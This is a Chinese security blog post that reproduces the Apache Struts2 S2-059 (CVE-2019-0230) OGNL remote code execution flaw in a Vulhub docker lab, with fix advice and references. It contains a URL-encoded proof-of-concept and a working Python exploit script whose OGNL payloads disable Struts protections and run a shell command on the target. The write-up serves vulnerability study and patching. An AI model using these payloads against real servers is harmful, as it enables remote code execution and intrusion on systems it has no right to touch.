rmi远程代码执行漏洞_Apache Struts2059远程代码执行漏洞复现

网安引领时代,弥天点亮未来   

ea1dbffc7377b21e08ec008a86185cb9.png 0x00漏洞简述   2020年08月13日,Apache官方发布了Struts2远程代码执行漏洞的风险通告,该漏洞编号为CVE-2019-0230,漏洞等级:高危,漏洞评分:8.5。 漏洞产生的主要原因是因为Apache Struts框架在强制执行时,会对分配给某些标签属性(如id)的属性值执行二次ognl解析。攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。 ea1dbffc7377b21e08ec008a86185cb9.png 0x01影响版本 Apache Struts2:2.0.0-2.5.20 ea1dbffc7377b21e08ec008a86185cb9.png 0x02漏洞复现

虚拟机部署docker安装Vulhub一键搭建漏洞测试靶场环境。

docker-compose up -d

1、访问漏洞环境

    d3d2365d9b71dcf47d90e9bdb3a76cc3.png               

2、POC验证,传入ognl表达式的poc: %{yun*zui} 这里需要URL编码

4180a88dbf7a633e05033d0ac4697016.png

http://192.168.60.131:8080/?id=%25%7Byun*zui%7D

从测试结果可以看到id属性返回了yun*zui的结果,漏洞存在!

2af76fcbafa67c642dfa05fdb2ade4cc.png

6b84d880f9bbb830e00566e932890e19.png

3、简单python脚本进行漏洞利用

import requestsurl ="http://192.168.60.131:8080"data1 = {    "id":"%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"}data2 = {   "id":"%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('touch/tmp/yunzui'))}"}res1 =requests.post(url, data=data1)# print(res1.text)res2 = requests.post(url,data=data2)# print(res2.text)

运行完脚本之后,将远程执行

touch/tmp/yunzui

cc95f290d96c3b7ddbde40b86e5d55a7.png

4、命令执行结果进入docker查看,成功执行

docker-compose exec struts2 bashls -al /tmp

db7d19109fa48e8a1cc1b85b630fb873.png

ea1dbffc7377b21e08ec008a86185cb9.png 0x03修复建议

升级到Struts2.5.22或更高版本

或者开启ONGL表达式注入保护措施

ea1dbffc7377b21e08ec008a86185cb9.png 0x04参考链接

https://cert.360.cn/warning/detail?id=d2b39f48fd31f3b36cc957f23d4777af

https://cwiki.apache.org/confluence/display/WW/S2-059

https://codeload.github.com/vulhub/vulhub/zip/master

137adda135bd10512a1f3be4b14b738d.gif 

知识分享完了

喜欢别忘了关注我们哦~

予以风动,必降弥天之润!

   弥  天

安全实验室

1bcdaf26e69759238262fb95c4e8363a.png
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值